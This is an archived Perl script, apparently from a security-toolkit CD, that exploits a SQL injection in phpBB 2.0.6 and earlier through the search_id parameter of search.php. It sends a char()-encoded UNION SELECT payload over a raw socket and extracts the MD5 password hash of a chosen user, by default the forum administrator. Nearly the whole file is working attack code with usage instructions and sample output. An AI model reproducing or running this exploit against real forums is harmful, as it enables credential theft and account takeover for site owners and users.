home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / phpbb / 2003.12.21.r57phpbb-poc.pl

< prev

next >

Wrap

Perl Script  |  2005-02-12  |  3KB  |  75 lines

---

1. #!/usr/bin/perl -w
2. use IO::Socket;
3. ##    PROOF-OF-CONCEPT
4. ##    * work only with mysql ver > 4.0
5. ##    * work only with post #1 
6. ##
7. ##    Example:
8. ##    C:\>r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2
9. ##    [~] prepare to connect...
10. ##    [+] connected
11. ##    [~] prepare to send data...
12. ##    [+] OK
13. ##    [~] wait for response...
14. ##    [+] MD5 Hash for user with id=2 is: 5f4dcc3b5aa765d61d8327deb882cf99
15. ##
16. if (@ARGV < 4)
17. {
18. print "\n\n";
19. print "|****************************************************************|\n";
20. print " r57phpbb.pl\n";
21. print " phpBB v<=2.06 search_id sql injection exploit (POC version)\n";
22. print " by RusH security team // www.rsteam.ru , http://rst.void.ru\n";
23. print " coded by f3sy1 & 1dt.w0lf // 16/12/2003\n";
24. print " Usage: r57phpbb-poc.pl <server> <folder> <user_id> <search_id>\n";
25. print " e.g.: r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2\n";
26. print " [~] <server> - server ip\n";
27. print " [~] <folder> - forum folder\n";
28. print " [~] <user_id> - user id (2 default for phpBB admin)\n";
29. print " [~] <search_id> - play with this value for results\n";
30. print "|****************************************************************|\n";
31. print "\n\n";
32. exit(1);
33. }
34. $success = 0;
35. $server = $ARGV[0];
36. $folder = $ARGV[1];
37. $user_id = $ARGV[2];
38. $search_id = $ARGV[3];
39. print "[~] prepare to connect...\n";
40. $socket = IO::Socket::INET->new(
41. Proto => "tcp",
42. PeerAddr => "$server",
43. PeerPort => "80") || die "$socket error $!";
44. print "[+] connected\n";
45. print "[~] prepare to send data...\n";
46. # PROOF-OF-CONCEPT reguest...
47. print $socket "GET /$folder/search.php?search_id=$search_id%20union%20select%20concat
48. (char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,
49. 116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,
50. 97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,
51. 105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34)
52. ,user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,
53. 59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,
54. 59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,
55. 58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,
56. 104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=$user_id/*
57. HTTP/1.0\r\n\r\n";
58. print "[+] OK\n";
59. print "[~] wait for response...\n";
60. while ($answer = <$socket>)
61. {
62. if ($answer =~ /;highlight=/)
63. {
64. $success = 1;
65. @result=split(/;/,$answer);
66. @result2=split(/=/,$result[1]);
67. $result2[1]=~s/&/ /g;
68. print "[+] MD5 Hash for user with id=$user_id is: $result2[1]\n";
69. }
70. }
71. if ($success==0) {print "[-] exploit failed =(\n";}
72. ## o---[ RusH security team | www.rsteam.ru | 2003 ]---o
73. -
74.  
75.